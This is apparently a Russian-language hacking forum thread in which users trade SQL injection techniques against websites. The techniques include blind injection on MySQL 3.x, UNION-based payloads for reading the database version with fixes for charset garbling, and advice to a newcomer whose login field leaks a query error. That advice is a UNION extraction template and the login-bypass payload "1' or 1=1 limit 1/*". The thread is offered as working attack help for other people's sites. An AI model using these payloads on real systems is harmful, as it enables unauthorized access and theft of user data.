|
Termin@L
4nob1oz Почитайте, наверно много нового узнаете... http://www.securitylab.ru/contest/212101.php |
Да знаю я что это blind :) Просто я ниразу с мускулем третим не работал и все пишут уже с union, а в третем просто нету его. Вообще жесть blind sql inj на mysql 3.x кошмар просто :)
To PSIH: Спасибо за линк чтото на подобие этого я и искал. |
Цитата:
Добавлено: При запросе ...?id=-1+union+select+1,2,3 вывод есть, а при При запросе ...?id=-1+union+select+1,version(),3 выводится хрень выше |
Цитата:
|
convert(version()+using+???) ?
|
version() using latin1 - попробуй так
|
union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version() , 0x71),0x71)
|
Здравствуйте я полохо знаю sql так что заранее спасибо.
У меня такой вопрос если в поле аутентификации я ввожу например 99 и ' и сервер мне выдает E_DB_QUERY SELECT * FROM `sunz_users` WHERE `login` = '99'' LIMIT 1; Могу я что нить отсюда выудить |
запрос вида
?login=-1'+union+select+someshit+from+sometable/* поможет) имена таблиц и столбцов надо подбирать. |
Цитата:
просто ввести в поле Код:
1' or 1=1 limit 1/*запрос который выполнится будет Код:
SELECT * FROM `sunz_users` WHERE `login` = '1' or 1=1 limit 1; |
| Время: 10:34 |